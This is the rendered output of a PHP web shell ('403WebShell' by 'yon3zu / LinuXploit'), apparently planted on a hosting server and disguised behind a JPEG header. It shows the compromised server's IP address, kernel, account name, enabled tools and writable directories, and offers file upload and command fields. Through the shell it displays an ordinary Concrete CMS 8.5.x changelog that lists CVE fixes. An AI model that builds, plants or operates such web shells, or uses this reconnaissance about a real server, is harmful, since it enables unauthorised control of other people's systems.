����JFIF��x�x����'403WebShell
403Webshell
Server IP : 78.140.185.180  /  Your IP : 18.218.185.164
Web Server : LiteSpeed
System : Linux cpanel13.v.fozzy.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
User : builderbox ( 1072)
PHP Version : 7.3.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/softaculous/conc85/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /var/softaculous/conc85/changelog.txt
8.5.15

Behavioral Improvements

    Ignore E_USER_NOTICE and E_USER_DEPRECATED errors (thanks mlocati)
    Do not combine CAPTCHA JS because it fails to load in some cases (thanks JeRoNZ)
    Removed some extraneous and unnecessary files from the ckeditor js/ directory.

Bug Fixes

    Fixed “CKEditor is not secure” notice when loading CKEditor.

Developer Updates

    formatSize() now supports sizes beyond gigabytes (thanks mlocati)
	
8.5.14

Bug Fixes

    We continue to support TLS 1.2 in Zend Mail (thanks hissy, mlocati)

Security Fixes

    Fixed CVE-2023-48653 Cross Site Request Forgery (CSRF) via ccm/calendar/dialogs/event/delete/submit by updating Update Dialog endpoints to only accept Post requests with tokens included with commit 11765 for 8.5.14. Prior to fix, an attacker can force an admin to delete events on the site because the event ID is numeric and sequential. The Concrete CMS Security team scored this 4.3 with CVSS v3 vector AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N Thanks Veshraj Ghimire for reporting.
    Fixed CVE-2023-48650 Stored XSS in Layout Preset Name with commit 11765 in 8.5.14. The Concrete CMS Security team scored this 3.5 with CVSS v3 vector AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:N Thanks Solar Security CMS Research, [d0bby](with https://hackerone.com/d0bby), wezery0, silvereniqma in collaboration for reporting!
	
8.5.13
Bug Fixes

	Fixed bug where Express association control would be required if present in form even if the admin hadn’t marked it as required (thanks yildirimmurat)
	Fixed link to user profile from Communty authentication (thanks mlocati)
	Fixed some instances where the CollectionSearchIndexAttributes table might be updated based on the latest version instead of the approved version (thanks biplobice)
	Fixed: Gettext uses deprecated array_key_exists() which throws a ConversionException on PHP 7.4 (thanks 1stthomas, mlocati)
	We now properly sanitize the output of files uploaded through Express Forms.

8.5.12
Bug Fixes

    More PHP 5 fixes (thanks mlocati)
    Improved testing for PHP 5 compatibility

Youez - 2016 - github.com/yon3zu
LinuXploit